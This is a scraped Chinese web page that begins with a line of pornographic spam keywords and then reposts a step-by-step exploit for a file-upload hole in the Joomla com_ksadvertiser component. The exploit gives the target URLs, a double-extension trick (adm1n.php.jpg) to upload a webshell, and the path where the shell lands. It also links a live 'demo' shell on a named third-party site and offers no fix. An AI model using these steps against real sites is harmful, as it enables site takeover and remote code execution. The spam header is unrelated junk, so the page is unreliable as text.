操人视频99青青av|亚洲a极淫交3P毛片电影|精品蜜桃人妻天天久|国产精品色婷婷免费|正规av网站在线免费观看|国产精品高清在线观看|免费成人网站在线|97干色五月天最黄三级无码片|在线免费观看黄色毛片A片|日韩无码视频一二三四区

Joomla 遠(yuǎn)程上傳漏洞.直接getshell漏洞預(yù)警 -電腦資料

電腦資料 時(shí)間:2019-01-01 我要投稿
【www.emoneyp.cn - 電腦資料】

   

    作者:1337

    1. 有些joomal需要先注冊.

    http://site/index.php?option=com_user&view=login

    2. 到上傳地址

    http://site/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en

    3. 點(diǎn)擊image后點(diǎn)擊upload,選擇shell, 將shell重名為adm1n.php.jpg格式.

    4. 上傳后的文件在 / images/ksadvertiser/U0 這個(gè)目錄下.

    http://site/images/ksadvertiser/U0/adm1n.php.gif

    Demo: http://alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif

    我隨便測試了一下, 基本都被搞了. 瘋狂的人們啊, 這今天剛出的漏洞就成這樣了… 1337V5啊.

最新文章